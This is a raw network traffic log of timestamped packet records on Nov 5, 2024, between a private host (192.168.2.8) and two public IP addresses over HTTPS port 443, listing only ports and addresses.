Nov 5, 2024 16:36:50.973746061 CET	443	49710	142.250.185.238	192.168.2.8
Nov 5, 2024 16:36:50.974114895 CET	443	49710	142.250.185.238	192.168.2.8
Nov 5, 2024 16:36:50.974165916 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:50.977139950 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:51.023329020 CET	443	49710	142.250.185.238	192.168.2.8
Nov 5, 2024 16:36:51.344122887 CET	443	49710	142.250.185.238	192.168.2.8
Nov 5, 2024 16:36:51.344194889 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:51.344542980 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:51.344592094 CET	443	49710	142.250.185.238	192.168.2.8
Nov 5, 2024 16:36:51.344650030 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:51.370865107 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:51.370912075 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:51.370989084 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:51.371272087 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:51.371290922 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:52.252598047 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:52.252717018 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:52.257026911 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:52.257041931 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:52.257379055 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:52.257460117 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:52.257848024 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:52.303343058 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.280328989 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.280400991 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.288798094 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.288880110 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.402148008 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.402225018 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.402247906 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.402261019 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.402306080 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.402306080 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.402316093 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.402370930 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.402525902 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.402575016 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.402617931 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.402667999 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.404263973 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.404356003 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.404360056 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.404405117 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.413361073 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.413449049 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.413466930 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.413526058 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.423808098 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.423927069 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.423934937 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.424021006 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.430644035 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.430717945 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.430722952 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.430754900 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.439357042 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.439456940 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.439462900 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.439511061 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.448232889 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.448295116 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.448317051 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.448364019 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.458154917 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.458256960 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.458262920 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.458319902 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.523801088 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.523873091 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.523911953 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.523917913 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.523917913 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.523936987 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.523950100 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.524017096 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.524230003 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.524283886 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.524288893 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.524365902 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.524410963 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.524477959 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.524482012 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.524529934 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.525075912 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.525140047 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.525144100 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.525177002 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.525193930 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.525198936 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.525228024 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.525269985 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.525978088 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.526041985 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.526048899 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.526091099 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.526096106 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.526130915 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.526143074 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.526181936 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.534859896 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.534936905 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.534940004 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.534954071 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.534976959 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.535002947 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.535022020 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.535026073 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.535042048 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.535098076 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.543796062 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.543853998 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.543859959 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.543955088 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.546597958 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.546664000 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.546669006 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.546701908 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.552650928 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.552707911 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.552937031 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.552975893 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.557921886 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.558052063 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.558058023 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.558129072 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.563261032 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.563303947 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.563311100 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.563359976 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.569148064 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.569216967 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.569221973 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.569257975 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.575541973 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.575598955 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.575603008 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.575642109 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.580481052 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.580545902 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.580550909 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.580604076 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.585913897 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.586021900 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.586028099 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.586070061 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.591944933 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.592159033 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.592165947 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.592272043 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646522045 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646601915 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646609068 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646645069 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646652937 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646656990 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646686077 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646694899 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646713972 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646718025 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646733999 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646765947 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646773100 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646786928 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646805048 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646836996 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646841049 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646872044 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646894932 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646898985 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646918058 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646945953 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.646950006 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.646989107 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.647243023 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.647284985 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.647298098 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.647330046 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.647336006 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.647368908 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.647391081 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.647445917 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.647449970 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.647536993 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.649173021 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.649218082 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.649255037 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.649260998 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.649293900 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.649293900 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.651063919 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.651189089 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.651195049 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.651242018 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.654057980 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.654156923 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.655709028 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.655765057 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.656903028 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.656958103 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.657004118 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.657073021 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.661907911 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.661956072 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.661961079 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.662076950 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.665666103 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.665725946 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.665730953 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.665795088 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.665798903 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.665827990 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.665832043 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.665865898 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.668840885 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.668890953 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.668895960 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.669059992 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.671617031 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.671770096 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.671773911 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.671812057 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.674392939 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.674458981 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.674495935 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.674539089 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.677299976 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.677385092 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.677390099 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.677448988 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.679955959 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.680038929 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.680155993 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.680193901 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.682838917 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.682920933 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.682926893 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.682981014 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.685657978 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.685712099 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.685715914 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.685806036 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.690140963 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.690227985 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.690272093 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.690310001 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.691231012 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.691273928 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.691278934 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.691332102 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.694216013 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.694272995 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.694278002 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.694315910 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.696461916 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.696523905 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.696527958 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.696578979 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.699088097 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.699146032 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.699151993 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.699234009 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.701945066 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.702008963 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.702013969 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.702081919 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.704397917 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.704551935 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.704559088 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.704607010 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.706975937 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.707041979 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.707056999 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.707149029 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.709661007 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.709743023 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.709748030 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.709781885 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.712440968 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.712477922 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.712516069 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.712551117 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.714765072 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.714818001 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.714822054 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.714888096 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.717108965 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.717155933 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.717159986 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.717231035 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.719990015 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.720058918 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.720062971 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.720108032 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.721983910 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.722029924 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.722033024 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.722043037 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.722101927 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.722101927 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.724503994 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.724549055 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.724553108 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.724586010 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.726878881 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.726933956 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.726938963 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.726995945 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.729397058 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.729450941 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.729454994 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.729537010 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768332958 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768430948 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768451929 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768461943 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768492937 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768502951 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768521070 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768521070 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768527985 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768552065 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768584967 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768589020 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768626928 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768817902 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768872976 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768876076 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768882990 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768908024 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768939972 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768954039 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.768958092 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.768981934 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.769004107 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.769017935 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.769021988 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.769072056 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.769072056 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.769663095 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.769712925 CET	49711	443	192.168.2.8	216.58.206.65
